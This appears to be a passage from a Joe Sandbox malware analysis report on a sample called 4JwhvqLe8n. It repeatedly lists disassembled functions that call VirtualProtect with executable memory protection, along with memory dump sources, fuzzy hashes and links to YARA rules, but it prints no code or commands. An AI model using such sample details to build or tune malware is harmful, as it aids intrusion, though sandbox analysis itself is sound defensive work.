                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 3:AG$4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-1039757258
                                                                                                                                                      • Opcode ID: a14636402641cdc90e2a3ae344e612cf7a413b34b7f0bff16f9358804314e8f4
                                                                                                                                                      • Instruction ID: 35a6c91b93bcc543530c330e6d87c59423f88a8d6f3860633bbcfde72b804a63
                                                                                                                                                      • Opcode Fuzzy Hash: a14636402641cdc90e2a3ae344e612cf7a413b34b7f0bff16f9358804314e8f4
                                                                                                                                                      • Instruction Fuzzy Hash: 8BD135A1D082989BF7218624DC857EB7B79EF81310F1481FAD44D66281D27E1FC6CB67
                                                                                                                                                      Function 0040AAFE Relevance: 47.9, APIs: 2, Strings: 25, Instructions: 605memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      • Opcode ID: a925c94ffabaf015efd4f7eb9d6fa3693e8b66dee7b3c4d0b14de535cd6fcc3c
                                                                                                                                                      • Instruction ID: e31c6f0428a1ad879084d030e7b3d80e503b2bf2136415014f88d123122c71be
                                                                                                                                                      • Opcode Fuzzy Hash: a925c94ffabaf015efd4f7eb9d6fa3693e8b66dee7b3c4d0b14de535cd6fcc3c
                                                                                                                                                      • Instruction Fuzzy Hash: 072247A2D041649BF7208A24DC84BEB7B79EF81310F1481FAD94D67681D67D1FC2CBA6
                                                                                                                                                      Function 0040A9D8 Relevance: 47.7, APIs: 2, Strings: 25, Instructions: 412memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      • Opcode ID: c8ff61ae7923f3cb0b20b01443531368cd2783225380f890d4868acec7d31617
                                                                                                                                                      • Instruction ID: d3bba2d6cd0b6a7d7d00e7274d5b21a2e9ebe1fb828867428a6b522fd52b3a50
                                                                                                                                                      • Opcode Fuzzy Hash: c8ff61ae7923f3cb0b20b01443531368cd2783225380f890d4868acec7d31617
                                                                                                                                                      • Instruction Fuzzy Hash: CBE148A2D082989BF7208624DC84BEB7B79DB91310F1481FED54D66281D27E0FC6CB66
                                                                                                                                                      Function 0040ADBC Relevance: 47.7, APIs: 2, Strings: 25, Instructions: 409memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      • Opcode ID: e420d99aab8d8a40d7b77b49183ddae203b30ee2c4ae5c92981083dcb75b744e
                                                                                                                                                      • Instruction ID: 55feaba93ad7e77a48e0621d9403177f2a566d95734184cbc5de5217829b400d
                                                                                                                                                      • Opcode Fuzzy Hash: e420d99aab8d8a40d7b77b49183ddae203b30ee2c4ae5c92981083dcb75b744e
                                                                                                                                                      • Instruction Fuzzy Hash: EFE126A2D082A49BF7218624DC847EB7B79EF91310F1481FAD54D67281D27D0FC6CBA6
                                                                                                                                                      Function 0040AE15 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 400memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      • Opcode ID: f2b6b822a4df9635161e2a3e904afa6614a7ee560212dbeba7cc05792f73b947
                                                                                                                                                      • Instruction ID: 913d053d6a4b87e8076cff9152b857ea02e6a9364de0a608fca4d402f9b139d6
                                                                                                                                                      • Opcode Fuzzy Hash: f2b6b822a4df9635161e2a3e904afa6614a7ee560212dbeba7cc05792f73b947
                                                                                                                                                      • Instruction Fuzzy Hash: 47E137A2D082A49BF7218624DC44BEB7B79DF91310F1481FAD54D66281D27E0FC6CBA7
                                                                                                                                                      Function 0040AE1C Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 397memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      • Opcode ID: 50bd9d5ab837e02da883fdefca2b0946b567497e94e9fb5ec3c5763d0cae3670
                                                                                                                                                      • Instruction ID: b89b7103d0fa27695ef78c0a4bb348488d698b876d94e036660cb1bab365a026
                                                                                                                                                      • Opcode Fuzzy Hash: 50bd9d5ab837e02da883fdefca2b0946b567497e94e9fb5ec3c5763d0cae3670
                                                                                                                                                      • Instruction Fuzzy Hash: 4FE126A2D082A49AF7218624DC447EB7B79DF91310F1481FAD54D6A281D27E0FC6CB67
                                                                                                                                                      Function 0040AE38 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 395memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      • Opcode ID: 23ef9a7b39ce9d328e365ae41671bb2b66ede6d6743c8988016826178aa77dee
                                                                                                                                                      • Instruction ID: 366b05091882c9197e83a7fdb40bb8b0b69c0581f31768dc85c13bca754d95be
                                                                                                                                                      • Opcode Fuzzy Hash: 23ef9a7b39ce9d328e365ae41671bb2b66ede6d6743c8988016826178aa77dee
                                                                                                                                                      • Instruction Fuzzy Hash: 77E136A2D082A49BF7218624DC447EB7B79EF91310F1481FAD54D67281D27E0FC6CB66
                                                                                                                                                      Function 0040A954 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 393COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      • Opcode ID: 0ad95aec03d049a785a27f8ab78db8fc1a74cc6957920696c18b6f03b6a14bf5
                                                                                                                                                      • Instruction ID: c6b4abe6201f42a9dc069e46274cd9b3491ae5b1b96948f19b1286337f56ceaf
                                                                                                                                                      • Opcode Fuzzy Hash: 0ad95aec03d049a785a27f8ab78db8fc1a74cc6957920696c18b6f03b6a14bf5
                                                                                                                                                      • Instruction Fuzzy Hash: 80E146A2D082A49AF7218624DC44BEB7B79DF91310F1481FED44D6A281D27E0FC6CB67
                                                                                                                                                      Function 0040AAB2 Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 392memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      • Opcode ID: 2b65a9afca3fe0157da0e974b2c5d5dd3769f05387e5c7f4a3326f01f4ef5363
                                                                                                                                                      • Instruction ID: ed8e06320c1ad1f63d05f356348c29088993c0ffd5424871ee90d4ef865e1f34
                                                                                                                                                      • Opcode Fuzzy Hash: 2b65a9afca3fe0157da0e974b2c5d5dd3769f05387e5c7f4a3326f01f4ef5363
                                                                                                                                                      • Instruction Fuzzy Hash: 58D145A2D082A49AF7218624DC44BEB7B79EF91310F1481FED54D66281D27E0FC6CB67
                                                                                                                                                      Function 0040AAAD Relevance: 47.6, APIs: 2, Strings: 25, Instructions: 389memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
